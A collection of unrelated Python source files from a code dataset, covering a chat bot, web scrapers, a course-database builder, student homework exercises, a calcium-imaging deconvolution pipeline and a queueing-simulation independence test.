not in self.authUsers:\n self.authUsers.append( username )\n \n def addCommand( self, command, message ):\n if command not in self.commands.keys():\n self.commands[ command ] = message\n \n def parseMessage( self, message ):\n if message.message in self.commands.keys() and message.username in self.authUsers:\n sendMessage( self.driver, self.commands[ message.message ] )\n \n def findMessageMatchPoint( self, scrapedMessages ):\n #Find find the index to current message match point, start by iterating backwards through the log\n for logIdx in range( len( self.messageLog ) - 1, -1, -1 ):\n \n #Compare against the messages in the last grab\n for msgIdx in range( 0, len( scrapedMessages ) ):\n \n #If the username and message are the same, we have a tentative match\n if( compareMessages( self.messageLog[ logIdx ], scrapedMessages[ msgIdx ] ) ):\n return msgIdx\n \n return 0\n \n def checkForMessages( self ):\n newMessages = self.messageManager.processMessages( getMessages( self.driver ) )\n \n for msg in newMessages:\n self.parseMessage( msg )\n\nif __name__ == \"__main__\":\n \n #Create the bot\n dazBot = DazBot( \"https://www.kamcord.com/live/evolution590/chat\" )\n\n #Add all of the users and commands\n dazBot.addAuthorizedUser( \"evolution590\" )\n dazBot.addAuthorizedUser( \"DazBoot\" )\n dazBot.addAuthorizedUser( \"Gravithon\" )\n \n dazBot.addCommand( \"!test\", \"This is a test command!\" )\n dazBot.addCommand( \"!commands\", \"GET OUT OF HERE!\" )\n\n \n #Connect and login\n time.sleep( 1 ) #Wait 1 second for the page to load before we continue\n sendMessage( dazBot.driver, \"Test message from DazBot\" )\n time.sleep( 1 ) #Wait 1 second for the login prompt before we continue\n login( dazBot.driver, USERNAME, PASSWORD )\n time.sleep( 1 ) #Wait 1 second for login to complete before we continue\n\n \n while( True ):\n dazBot.checkForMessages()\n time.sleep( 0.5 
)","repo_name":"MeJosh/KamcordChatBot","sub_path":"python/src/dazbot.py","file_name":"dazbot.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1326671537","text":"# import required libraries\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\n\r\n# download selected website\r\nr = requests.get(\"https://www.sjsu.edu/\")\r\n\r\n# get the html code of the selected site\r\nsoup = BeautifulSoup(r.text, \"html.parser\")\r\n\r\n# generate a list of elements on the site with the class \"o-calender__date\"\r\ndates = soup.select(\".o-calendar__date\")\r\n\r\n# create a task that runs for every item in dates\r\nfor d in dates:\r\n\t# print the text contained within the \"o-calender__date\" into the terminal window\r\n\tprint(d.text)","repo_name":"Chelsea-Thompto-Teaching-Examples/web_scraping_demo_f2020","sub_path":"scrap_ex1.py","file_name":"scrap_ex1.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71683310884","text":"import os.path\n\nfilePathAlles = '/Users/aaikoosters/Documents/Develop/TensorFlow_python/CodeProjects/lifecycleSet/train_FD001.txt'\n\nbasePath = os.getcwd() + '/'\nfilename = 'lifecycleSet/train_FD001.txt'\nfilenameUni1 = 'lifecycleSet/uni1_train.txt'\nfileSavePath = basePath + 'units/'\nprint(fileSavePath)\n\n\ndef writeToFile(listOfUnits, unitNumber):\n txtFile = open(fileSavePath + 'train_unit{}.txt'.format(unitNumber), 'w')\n print(txtFile)\n for x in listOfUnits:\n txtFile.write(x)\n txtFile.close()\n \nunitLines = []\nwith open(basePath+filename) as fp:\n line = fp.readline()\n unitNumber = 1\n while line:\n words = line.split()\n if int(words[0]) != unitNumber:\n writeToFile(unitLines, unitNumber)\n unitNumber += 1\n unitLines = []\n # end if\n lines = line.strip()\n # print(\"A {}: {}\".format(words[0], lines))\n line = fp.readline()\n unitLines.append(lines)","repo_name":"ndegier/ML4All","sub_path":"MLNET.Python/splitUnits.py","file_name":"splitUnits.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71056115365","text":"def is_right(a, b, c):\r\n '''Returns whether or not the three random integer numbers represent the three sides of a right-angled triangle\r\n Parameters:\r\n a, b, c - The three random integer numbers that represent three sides of a triangle\r\n Returns:\r\n True - if the three numbers represent the sides of a right-angled triangle\r\n False - if the three numbers do not represent the sides of a right-angled triangle \r\n '''\r\n if type(a) != int or type(b) != int or type(c) != int: #the values must be integers\r\n print(\"The numbers must be integers. Please type in integers\")\r\n return None\r\n elif a < 0 or b < 0 or c < 0: #the values must not be negative integers\r\n print(\"The numbers must be positive integer numbers. 
Please type in positive numbers\")\r\n return None \r\n else: # since the numbers can be given in any order we would have to consider which is the hypotenuse of the function.\r\n # So we consider for each values of a, b, c which it could be now that they are integers\r\n if a > b and a > c: # a is the largest of the three set of values and the hypotenuse\r\n if a**2 == b**2 + c**2:\r\n return True\r\n else:\r\n return False \r\n elif b > a and b > c: # b is the largest of the three set of values and the hypotenuse\r\n if b**2 == a**2 + c**2:\r\n return True\r\n else:\r\n return False\r\n else: # c is the largest of the three set of values and the hypotenuse\r\n if c**2 == a**2 + b**2:\r\n return True\r\n else:\r\n return False\r\n\r\nif __name__ == \"__main__\":\r\n print(is_right(10, 8, 6))\r\n print(is_right(8, 17, 15))\r\n print(is_right(5, 12, 13))\r\n print(is_right(10, 11, 12))\r\n print(is_right(10.0, 8.3, 6))\r\n print(is_right(\"10\", \"8\", \"6\"))\r\n print(is_right(-10, -8, -6))\r\n\r\n \r\n\r\n\r\n\r\n ","repo_name":"Akande-o/CTU-FEE","sub_path":"PRG/GRADED HOMEWORKS/triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12821923946","text":"\n\n'''\nBuild two classes of your choice that can model a real-life example.\nThe class needs to meet the following requirements:\n\n at least 5 attributes each\n\n at least 2 methods each\n\n one class to inherit from another\n\nAs a demonstration create at least 5 instances of\none class (preferably the child class) and\ncall all the methods it holds\n\nEx: You can have one class (Country) that has general attributes\nabout countries such as area, neighbours, cities etc and\nmethods related to those attributes. 
The second class can be a\nspecific country (Romania) that has more specific attributes\nsuch as attractions, universities etc.\n'''\n\n# main class (parent class)\nclass Car(object):\n category = 'automobil'\n\n def __init__(self, brand, series, version, year, cubic_cap, power):\n self.brand = brand\n self.series = series\n self.var = version\n self.year = year\n self.cub_c = int(cubic_cap)\n self.power = int(power)\n\n # method that converts the power from [kW] in [hp] and compare it wit a specific value\n def print_message_medium_high_power(self):\n if int(self.power * 1.36) >= 200:\n print(\n f'\\nAutomobilul {self.brand} {self.var} din {self.year} dezvolta',\n f'{int(self.power * 1.36)} cai putere, automobil sportiv.'\n )\n else:\n print(\n f'\\nAutomobilul {self.brand} {self.var} din {self.year} dezvolta',\n f'{int(self.power * 1.36)} cai putere, are putere medie.'\n )\n\n # method that print a message\n @staticmethod\n def print_step():\n print('\\nTEST DE PUTERE')\n\n # method that calculate the taxes for a vahicle\n def tax(self):\n cubic_cil_test = (0, 1601, 2001, 2601, 3001)\n for x in range(len(cubic_cil_test) - 1):\n if self.cub_c in range(cubic_cil_test[x], cubic_cil_test[x + 1]):\n print(f'\\nPentru automobilul {self.brand} {self.var} a carui motor',\n f'are cilindreea de {self.cub_c} cmc, impozitul anual este',\n f'{tax_calc(self.cub_c, x):.2f} lei')\n if self.cub_c >= 3001:\n print(f'\\nPentru automobilul {self.brand} {self.var} a carui motor',\n f'are cilindreea de {self.cub_c} cmc, impozitul anual este',\n f'{tax_calc(self.cub_c, x + 1):.2f} lei')\n\n# child class of Automobil class an ads some new proprieties\nclass FuelCons(Car):\n\n def __init__(self, brand, series, version, year, cubic_cap, power, med_cons):\n self.cons = float(med_cons)\n super().__init__(brand, series, version, year, cubic_cap, power)\n\n # method calculates how many km cand you do with the fuel from the tank\n def range(self):\n quantity = float(input('\\nIntrodu cantitatea de combustibil din rezervor [l]: '))\n range_var = quantity / self.cons * 100\n print(f'\\nCu {quantity} litri de combustibil poti parcurge {range_var:.0f} km.')\n input('\\n\\33[31mPress Enter to continue...\\033[0m')\n\n def __repr__(self):\n class_name = type(self).__name__\n return '{} ({} {} {} - {} {} {}) [{}]'.format(\n class_name, self.brand,\n self.series, self.var, self.year, self.cub_c, self.power, id(self)\n )\n\n def __str__(self):\n return '{} {} {} - {} {} {}'.format(\n self.brand.ljust(10, ' '),\n self.series.ljust(10, ' '), self.var.ljust(8, ' '), self.year,\n str(self.cub_c).center(10), str(self.power).center(8))\n\nclass AutoFleet():\n\n def __init__(self, auto_list=None):\n self._autos = list(auto_list) if auto_list else []\n\n def __iter__(self):\n return iter(self._autos)\n \n\n# function calculate the auto txes\ndef tax_calc(cub_c, ind):\n return cub_c / 200 * tax_ind[ind]\n\n# function for inputing the vhicle datas\ndef auto_input():\n return FuelCons(\n input('Introdu marca automobilului:'),\n input('Introdu tipul automobilului: '),\n input('Introdu varianta automobilului: '),\n input('introdu anul de fabricatie: '),\n input('Introdu cilindreea motorului [cmc]: '),\n input('Introdu puterea motorului [kw]:'),\n input('Introdu consumul mediu de combustibil [l/100km]:')\n )\n\n# function process auto datas\ndef fleet_processing(list_in):\n for auto in list_in:\n auto.tax()\n auto.print_step()\n auto.print_message_medium_high_power()\n auto.range()\n\n\ntax_ind = (8, 19, 76, 153, 308)\n\n\n# creates the 
list with vehicles\ncars_list = [\n FuelCons('BMW', 'Seria 5', '530d', 2015, 2996, 210, 9.6),\n FuelCons('Audi', 'A6', '2.0Tdi', 2012, 1960, 140, 6.3),\n FuelCons('Mercedes', 'C-classe', 'C220cdi', 2014, 2156, 150, 7.4)\n]\n\nauto_fleet = AutoFleet(cars_list)\n\n\nprint('\\nse vor prelucra datele pentru urmatoaarea lista de automobile: \\n')\nprint('\\n MARCA TIP VARIANTA AN CILINDREE PUTERE')\n\n# print the list with vehicles\nfor auto in auto_fleet:\n print(auto)\n\ninput('\\n\\33[31mPress Enter to continue...\\033[0m')\n\nfleet_processing(auto_fleet)\n\nauto1 = auto_input()\nauto1.print_step()\nauto1.print_message_medium_high_power()\nauto1.tax()\nauto1.range()\n","repo_name":"mariuspodean/CJ-PYTHON-01","sub_path":"lesson_9/mosut_sorin/hw_lesson9_classes_mosut_sorin.py","file_name":"hw_lesson9_classes_mosut_sorin.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"70093325605","text":"from bs4 import BeautifulSoup\r\nimport bs4\r\nimport requests\r\nimport sqlite3\r\nfrom urllib import urlencode\r\n\r\n\r\ntables = {'courses': 'Discipline TEXT, Number TEXT, Title TEXT', \r\n 'offerings': 'YearTerm TEXT, course_id INTEGER, Code INTEGER, ' +\r\n 'Type TEXT, Section TEXT, Units TEXT, Instructor TEXT, Time TEXT, ' + \r\n 'Place TEXT, Capacity INTEGER, Enrolled INTEGER, Waitlisted INTEGER, ' + \r\n 'Requests TEXT, Restrictions TEXT, Books TEXT, Site TEXT, Status TEXT'}\r\n\r\ndef get_tables(db):\r\n return [a[0] for a in db.execute(\"select name from sqlite_master where type = 'table'\").fetchall()]\r\n\r\ndef create_table(db, name, attrs):\r\n if name in get_tables(db):\r\n return\r\n else:\r\n db.execute('CREATE TABLE %s(id INTEGER PRIMARY KEY, %s)' % (name, attrs))\r\n\r\ndef parse_html(html):\r\n soup = BeautifulSoup(html, 'html.parser')\r\n cl = soup.find('div', {'class':'course-list'})\r\n offerings = []\r\n courseInfo = []\r\n for course in cl.find_all('tr', valign='top'):\r\n if course.get('bgcolor') == '#fff0ff':\r\n if len(offerings) > 0:\r\n yield courseInfo, offerings\r\n offerings = []\r\n discNum = course.find('td').text\r\n discNum = [i.strip() for i in discNum.split('\\xa0') if i.strip()]\r\n #keys = ['Discipline', 'Number', 'Title']\r\n courseInfo = [discNum[0], discNum[1], discNum[2]]\r\n else:\r\n info = course.find_all('td')\r\n text = [t.text.replace('\\xa0', '').strip() for t in info]\r\n if len(text) == 13:\r\n text.insert(12, '')\r\n text.append('')\r\n if len(text) == 14:\r\n text.insert(10, '')\r\n if len(text) != 15:\r\n print(text, len(text))\r\n\r\n #keys = ['Code', 'Type', 'Section', 'Units', 'Instructor', 'Time', 'Place', 'Capacity', 'Enrolled', 'Waitlisted', 'Requests', 'Restrictions', 'Books', 'Site', 'Status']\r\n offerings.append(text)\r\n if courseInfo:\r\n yield courseInfo, offerings\r\n\r\ndef query_websoc(**values):\r\n url = 'http://websoc.reg.uci.edu/perl/WebSoc'\r\n data = urlencode(values)\r\n data = data.encode('utf-8')\r\n req = requests.get(url, params=data)\r\n the_page = req.text\r\n return [(course, offerings) for course, offerings in parse_html(the_page)]\r\n\r\ndef get_options(name):\r\n url = 'http://websoc.reg.uci.edu/perl/WebSoc'\r\n req = requests.get(url)\r\n the_page = req.text\r\n bs = BeautifulSoup(the_page, 'html.parser')\r\n s = bs.find('select', {'name': name})\r\n l = []\r\n for opt in s.find_all('option'):\r\n l.append(opt.get('value'))\r\n return l\r\n\r\n\r\ndef open_db(fname='websoc.db'):\r\n db = 
sqlite3.connect(fname)\r\n create_table(db, 'courses', tables['courses'])\r\n create_table(db, 'offerings', tables['offerings'])\r\n return db\r\n\r\nQUARTERS = {'Summer Session 2': '76', 'Summer Qtr': '51', '10-wk Summer': '39', 'Summer Session 1': '25', 'Spring Quarter': '14', 'Winter Quarter': '03', 'Fall Quarter': '92'}\r\n\r\ndef normalizeYearTerm(year, term):\r\n return '%d-%s' % (year, QUARTERS[term])\r\n\r\ndef scrape_courses(db, Discipline, YearTerm):\r\n cur = db.cursor()\r\n n = 0\r\n for course, offerings in query_websoc(Dept=Discipline, YearTerm=YearTerm):\r\n print(course)\r\n nums = cur.execute('SELECT id FROM courses WHERE Discipline = \"%s\" AND Number = \"%s\"' % (course[0], course[1])).fetchall()\r\n if len(nums) == 0:\r\n cur.execute('INSERT INTO courses(Discipline, Number, Title) VALUES (\"%s\",\"%s\",\"%s\")' % (course[0], course[1], course[2]))\r\n num = cur.lastrowid\r\n elif len(nums) == 1:\r\n num = nums[0][0]\r\n\r\n offerings = [[YearTerm, num] + offering for offering in offerings]\r\n #print([o for o in offerings if len(o) != 17])\r\n cur.executemany('DELETE FROM offerings WHERE YearTerm = ? AND Code = ?', [(off[0], off[2]) for off in offerings])\r\n cur.executemany('INSERT INTO offerings(YearTerm, course_id, Code, Type, Section, Units, Instructor, ' + \r\n 'Time, Place, Capacity, Enrolled, Waitlisted, Requests, Restrictions, Books, Site, Status) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)', offerings)\r\n \r\n db.commit()\r\n n += 1\r\n \r\n\r\ndef scrape_yearterm(db, YearTerm):\r\n for disc in get_options('Dept'):\r\n scrape_courses(db, Discipline=disc, YearTerm=YearTerm)\r\n\r\ndef update_db(db):\r\n cur = db.cursor()\r\n yt_opts = get_options('YearTerm')\r\n yts = cur.execute('SELECT DISTINCT YearTerm FROM offerings''').fetchall()\r\n yts = [yt[0] for yt in yts]\r\n yts = set(yt_opts) - set(yts)\r\n for yt in yts:\r\n print('Scraping %s' % yt)\r\n scrape_yearterm(db, yt)\r\n\r\ndef make_db(db):\r\n \r\n DEPTS = get_options(\"Dept\")\r\n yts = get_options('YearTerm')\r\n for school in DEPTS:\r\n for yearterm in yts:\r\n if school != ' ALL':\r\n scrape_courses(db, Discipline=school, YearTerm=yearterm)\r\n \r\n return db\r\n\r\ndef get_class(dept, num):\r\n db = open_db()\r\n \r\n\r\ndef console(db):\r\n from PyQt4 import QtGui\r\n app = QtGui.QApplication([])\r\n from pyqtgraph.console import ConsoleWidget\r\n cw = ConsoleWidget()\r\n cw.localNamespace.update(globals())\r\n cw.localNamespace.update(locals())\r\n cw.show()\r\n app.exec_()\r\n\r\ndef classes_like(db, num):\r\n num = num.replace('@', '_')\r\n cur = db.cursor()\r\n vals = cur.execute('''SELECT DISTINCT Number FROM courses WHERE Number like \"%s\"''' % num).fetchall()\r\n return [v[0] for v in vals]\r\n\r\nif __name__ == '__main__':\r\n db = open_db()\r\n print(classes_like(db, \"@1@@W\"))\r\n #make_db(db)\r\n #console(db)\r\n db.close()\r\n \r\n","repo_name":"BrettJSettle/ZotPlanner","sub_path":"cgi/old/websoc_scraper.py","file_name":"websoc_scraper.py","file_ext":"py","file_size_in_byte":5749,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"27101468835","text":"from django.contrib import admin\nfrom . 
import models\n# Register your models here.\n\n\nclass PhotoInline(admin.TabularInline):\n model = models.Photo\n\n\n@admin.register(models.Equiptment)\nclass EquiptmentAdmin(admin.ModelAdmin):\n \"\"\"EquiptmentAdmin Admin Definition\"\"\"\n inlines = (PhotoInline,)\n\n","repo_name":"areum514/highfive","sub_path":"equipments/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18479870798","text":"from pathlib import Path\n\nimport caiman\nimport caiman.source_extraction.cnmf as cm\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.ndimage\nfrom sklearn import preprocessing\n\nNAS_PROC_DIR = Path(\"/local/storage/Remy/natural_mixtures/processed_data\")\nstat_file_list = sorted(list(NAS_PROC_DIR.rglob('combined/stat.npy')))\n\n#%%\ndef load_traces(stat_file):\n F = np.load(stat_file.with_name('F.npy'))\n Fneu = np.load(stat_file.with_name('Fneu.npy'))\n iscell = np.load(stat_file.with_name('iscell.npy'))\n\n# def detrend_df_f(C, quantile_min=8, frames_window=200, return_baseline=False):\n# \"\"\" Compute dF/F, with baseline computed w/ rolling percentile window.\n#\n# :param C:\n# :param quantile_min:\n# :param frames_window:\n# :return:\n# \"\"\"\n# F0 = scipy.ndimage.percentile_filter(C, quantile_min, (frames_window, 1))\n# C_df = C./F0\n\ndef correct_and_deconvolve(C, oasis_params, quantile_norm=True):\n \"\"\"\n Takes parameters for baseline correction (suite2p.dcnv.preprocess) and deconvolution (oasis AR2, constrained\n foopsi) and returns block-corrected traces.\n\n :param Fc: neuropil-corrected fluorescence from suite2p ( = F - 0.7 * Fneu)\n :type Fc: np.ndarray\n \"\"\"\n n_cells, T = C.shape\n\n # quantile matching & transform, quantile_range=(0.25, 0.75)\n if quantile_norm:\n d = preprocessing.RobustScaler(with_centering=False).fit_transform(C)\n else:\n d = C\n\n # oasis deconvolution\n C_dec = np.zeros(d.shape)\n Bl = np.zeros(n_cells)\n C1 = np.zeros(d.shape)\n G = np.zeros((n_cells, 2))\n Sn = np.zeros(n_cells)\n Sp = np.zeros((n_cells, T))\n Lam = np.zeros(n_cells)\n\n for cid in range(C_dec.shape[0]):\n y = d[cid, :]\n\n #g0 = caiman.source_extraction.cnmf.deconvolution.estimate_time_constant(y, p=2, lags=5, fudge_factor=1.)\n #g = caiman.source_extraction.cnmf.deconvolution.estimate_time_constant(y, p=1, lags=10)\n c, bl, c1, g, sn, sp, lam = caiman.source_extraction.cnmf.deconvolution.constrained_foopsi(y, **oasis_params)\n C_dec[cid, :] = c\n Bl[cid] = bl\n C1[cid] = c1\n G[cid, :] = g\n Sp[cid, :] = sp\n #Sn[cid] = cm.deconvolution.GetSn(y)\n Sn[cid] = sn\n Lam[cid] = lam\n\n oasis_results = dict(C_dec=C_dec, bl=Bl, c1=C1, g=G, sp=Sp, sn=Sn, lam=Lam, oasis_params=oasis_params)\n return d, oasis_results\n\ndef load_and_detrend_F(stat_file):\n F = np.load(stat_file.with_name('F.npy'))\n Fneu = np.load(stat_file.with_name('Fneu.npy'))\n # iscell = np.load(stat_file.with_name('iscell.npy'))\n #cellprob = iscell[:, 1]\n #iscell = iscell[:, 0]\n\n Fneu_smoothed = scipy.ndimage.gaussian_filter1d(Fneu, sigma=3, axis=1, )\n Fc = F - 0.7 * Fneu_smoothed\n\n # detrend neuropil-corrected fluorescence\n F0 = scipy.ndimage.percentile_filter(Fc, 20, (1, 200)) # baseline\n C_df = (Fc - F0)/F0 # dF/F\n return C_df, Fc, F0\n\n\ndef main(stat_file):\n C_df, Fc, F0 = load_and_detrend_F(stat_file)\n\n # caiman deconvolution\n oasis_params = dict(p=1,\n penalty=0,\n g=np.array([.88]),\n smin=1,\n #lags=10,\n #smin=None,\n g_optimize=3,\n )\n 
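# run OASIS constrained-foopsi deconvolution on the detrended traces;\n    # quantile_norm=False keeps the values on the dF/F scale\n    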
C_qtn, oasis_results = correct_and_deconvolve(C_df, oasis_params=oasis_params, quantile_norm=False)\n\n save_file = stat_file.with_name('caiman_deconv_results.npy')\n np.save(save_file,\n dict(Fc=Fc, F0=F0, C_df=C_df, C_qtn=C_qtn, oasis_results=oasis_results),\n allow_pickle=True)\n return save_file\n\n#%%\nstat_file_list = stat_file_list[2:]\nsaved_files = []\n\nfor item in stat_file_list:\n print(f\"\\n{item.relative_to(NAS_PROC_DIR)}\")\n saved_files.append(main(item))\n print('file saved')\n\n\n\n\n#%%\n\n# sn_fcc = [cm.deconvolution.GetSn(y, method='mean') for y in Fcc]\n#\n# upper_quantile = np.percentile(Fcc, 75, axis=1)\n# lower_quantile = np.percentile(Fcc, 25, axis=1)\n# scaling_factor = upper_quantile - lower_quantile\n# Fcc = (Fcc-lower_quantile[:, np.newaxis])/scaling_factor[:, np.newaxis]\n\n#%% plot oasis results for list of cells\ncids = np.arange(0, 5)+40\n\nfig, axarr = plt.subplots(nrows=len(cids), ncols=1, figsize=(12, 10), sharey='col', tight_layout=True)\n\nfor cid, ax in zip(cids, axarr.flat):\n print(cid)\n #ax.plot(C_qtn[cid, :])\n #ax.plot(C_qtn[cid, :] - oasis_results['bl'][cid])\n #sn = oasis_results['sn'][cid]\n y = C_qtn[cid, :] - oasis_results['bl'][cid]\n #ax.axhline(np.percentile(y, 50))\n\n ax.plot(y)\n ax.plot(oasis_results['C_dec'][cid, :])\n ax.set_title(f\"cid={cid} |\"\n f\" snr={oasis_results['sn'][cid]:.3f}|\"\n f\" g={oasis_results['g'][cid]}|\"\n f\" lambda={oasis_results['lam'][cid]:.3f} | \"\n )\nplt.show()\n\n#%%\n# F0 = scipy.ndimage.percentile_filter(Fc, 8, (1, 350))\n#\n# cids = np.arange(0, 5)+100\n# fig, axarr = plt.subplots(nrows=len(cids), ncols=1, sharey='col',\n# figsize=(12, 10),\n# tight_layout=True)\n#\n# for cid, ax in zip(cids, axarr.flat):\n# ax.plot(Fc[cid, :])\n# ax.plot(F0[cid, :])\n# plt.show()\n# #%%\n#\n# fig, axarr = plt.subplots(nrows=len(cids), ncols=1, figsize=(12, 10), sharey='col', tight_layout=True)\n# for cid, ax in zip(cids, axarr.flat):\n# ax.plot(Fc[cid, :])\n# ax.plot(F[cid, :])\n# ax.plot(F_smoothed[cid, :])\n# ax.plot(Fneu_smoothed[cid, :])\n# plt.show()\n# #%% plot bulk fluorescence\n#\n# fig, axarr = plt.subplots(nrows=2, ncols=1)\n# Ftot = F.sum(axis=0) - 0.7* Fneu.sum(axis=0)\n# F0 = scipy.ndimage.percentile_filter(Ftot, 10, 200)\n#\n# axarr[0].plot(Ftot)\n# axarr[0].plot(F0)\n# #axarr[0].plot(Fneu.sum(axis=0))\n# axarr[1].plot((Ftot-F0)/F0)\n# plt.show()\n","repo_name":"jyang-2/CalciumVolumetric","sub_path":"src/suite2p_postprocess_outputs.py","file_name":"suite2p_postprocess_outputs.py","file_ext":"py","file_size_in_byte":5822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39490382113","text":"#!/bin/python\n\nimport gc\nimport io\nimport multiprocessing as mp\nimport time\nfrom contextlib import redirect_stdout\nfrom parallelqueue.base_models import *\nfrom parallelqueue.monitors import *\n\nfrom redundancy import hsic\n\nncpus = mp.cpu_count()\n\n# %%\n\n# User-set params\nsimrep = int(input(\"Number of reps: \")) # set to cores utilized in parallel to limit amount held in memory\nif simrep > ncpus: print(\"simrep should be <= to be safe\")\nToOrder = [5, 50, 100, 500] # N values to test\n# WARNING: N values too high can r/esult in memory leaks!\nseed = int(input(\"seed: \"))\nmaxtime = float(input(\"maxtime: \")) # max time used across all sims\nmintime = float(input(\"mintime: \"))\nrng = hsic.spanning_grid_uniform(maxtime - 1, mintime) # times to sample\nalpha = 0.1\n\n# %%\n\nprint(f\"Using ncpus={simrep}\")\n\n\nclass Concurrent:\n 
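\"\"\"Runs the JSQ(d)/Redundancy(d)/Threshold(d,r) queue simulations for each\n    N in order, farming the replications out over a multiprocessing pool.\"\"\"\n\n    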
def __init__(self, maxtime=1000, rho=0.9, d=2, r=2,\n order=range(2, 1000, 2), seed=123):\n self.rhoJSim = None\n self.r = r\n self.order = order\n self.d = d\n self.rho = rho\n self.maxtime = maxtime\n self._ts = None\n self.seed = seed\n\n def WriteEach(self, simrep=1, of=[\"TSim\"], ts=True):\n \"\"\" v rep within run\n res['Thresh(2,2)'][0][0].keys()\n ^run (N-size)\n Out[9]: dict_keys(['ReplicaSets', 'TimeQueueSize'])\"\"\"\n self._ts = ts\n self._sims = simrep\n labels = {self.RSim: f\"Redundancy({self.d})\", self.JSim: f\"JSQ({self.d})\",\n self.TSim: f\"Thresh({self.d},{self.r})\"}\n self.res = {}\n for sim in [self.__getattribute__(i) for i in of]:\n print(f\"Running {sim}\")\n self.res[labels[sim]] = self.ParallelSim(sim)\n\n def DoEach(self, of=[\"TSim\"], iters=1):\n self._ts = False\n labels = {self.RSim: f\"Redundancy({self.d})\", self.JSim: f\"JSQ({self.d})\",\n self.TSim: f\"Thresh({self.d},{self.r})\"}\n self.res = {}\n for sim in [self.__getattribute__(i) for i in of]:\n print(f\"Running {sim}\")\n results = self.ParallelSim(sim)\n self.res[labels[sim]] = pd.DataFrame(results)\n\n\n def RSim(self, reps):\n mons = [TimeQueueSize]\n testvalues = []\n for N in (self.order):\n _sim = RedundancyQueueSystem(maxTime=self.maxtime, parallelism=N, seed=self.seed + 2331 * N + reps,\n d=self.d,\n Arrival=random.expovariate,\n AArgs=(self.rho * N) / self.d, Service=random.expovariate, SArgs=1,\n Monitors=mons)\n _sim.RunSim()\n testvalues.append(_sim.MonitorOutput)\n if not self._ts:\n return np.array(testvalues)\n else:\n return np.mean(testvalues)\n\n def JSim(self, reps):\n mons = [TimeQueueSize]\n testvalues = []\n for N in (self.order):\n _sim = JSQd(maxTime=self.maxtime, parallelism=N, seed=self.seed + 2331 * N + reps, d=self.d,\n Arrival=random.expovariate,\n AArgs=(self.rho * N) / self.d, Service=random.expovariate, SArgs=1,\n Monitors=mons)\n _sim.RunSim()\n testvalues.append(_sim.MonitorOutput)\n if not self._ts:\n return np.array(testvalues)\n else:\n return np.mean(testvalues)\n\n def TSim(self, reps):\n mons = [TimeQueueSize]\n testvalues = []\n for N in (self.order):\n _sim = ParallelQueueSystem(maxTime=self.maxtime, parallelism=N, seed=self.seed + 2331 * N + reps,\n d=self.d,\n r=self.r,\n Arrival=random.expovariate,\n AArgs=(self.rho * N) / self.d, Service=random.expovariate, SArgs=1,\n Monitors=mons)\n _sim.RunSim()\n testvalues.append(_sim.MonitorOutput)\n if not self._ts:\n return np.array(testvalues)\n else:\n return np.mean(testvalues)\n\n def ParallelSim(self, sim):\n with mp.Pool(processes=ncpus) as p:\n res = p.map(sim, range(self._sims))\n return res\n\n def Results(self):\n return self.res\n\n\ndef SafeRun(maxtime=1000, rho=0.9, d=2, r=2, order=range(2, 20, 2),\n of=\"TSim\", seed=123, simrep=1, ts=True): # Throws out Concurrent when done\n \"\"\"\n Parallelized simulations with lambda such that\n rho = (d*lambda)/(mu*N) and mu = 1\n <=> lambda = (N*rho)/d.\n \"\"\"\n run = Concurrent(maxtime, rho, d, r, order, seed)\n run.WriteEach(of=[of], simrep=simrep, ts=ts)\n return run.Results()\n\n\n# %%\n\ndef rearrange_for_test(results, which=0, ToOrder=ToOrder):\n per_queue = {q: [] for q in range(ToOrder[which])}\n for sim in range(simrep):\n sim_results = results[sim][0][\"TimeQueueSize\"]\n queue_times = {q: {} for q in range(ToOrder[which])}\n for time, value in sim_results.items():\n for queue in range(ToOrder[which]):\n queue_times[queue][time] = value[queue]\n\n for queue in range(ToOrder[which]):\n per_queue[queue].append(queue_times[queue])\n return 
per_queue\n\n\ndef arr_t(X):\n return np.array(X).transpose()\n\n\ngc.collect() # clear memory of clutter from imports\n\n\n# %%\n\n# Outputs in tex tabular style\ndef sig(a):\n if a < 0.01:\n return \"***\"\n elif a < 0.05:\n return \"**\"\n elif a < 0.1:\n return \"*\"\n return \"\"\n\n\nwith open(f\"output/{maxtime}fintabular_{seed}_{rng[:3]}..._{alpha}:{time.time()}.txt\", \"w\") as ls:\n ls.write(f\"\\hline \\n\")\n ls.write(f\"$\\\\rho$ & $N$ & $r$ & $\\\\hat p(H_{'{a}'})$ \\\\\\ \\n\")\n ls.write(f\"\\hline \\n\")\n ls.write(f\"\\hline \\n\")\n ls.flush()\n for r in [0.8, 0.9, 0.99]: # values of rho to test\n for thresh in [1, 2]:\n for i in range(len(ToOrder)):\n results = SafeRun(of=\"TSim\", order=[ToOrder[i]], maxtime=maxtime, rho=r, r=thresh, simrep=simrep,\n ts=False, seed=seed)\n results = results[list(results.keys())[0]] #\n sim_per_queue = rearrange_for_test(results, i)\n del results\n gc.collect()\n f = io.StringIO()\n with redirect_stdout(f):\n data_sim = [arr_t(hsic.time_sampler(sim_per_queue[m], rng)) for m in range(ToOrder[i])]\n del sim_per_queue\n test = hsic.dHSIC_resample_test(data_sim, 500)\n assert test <= 1\n ls.write(\n f\"{r if i == 0 and thresh == 2 else ''} & {ToOrder[i]} & {thresh} & {round(test, 3) if test is not None else None} {sig(test)} \\\\\\ \\n\")\n if i == 4 and thresh == 2:\n ls.write(f\"\\hline \\n\")\n ls.flush()\n 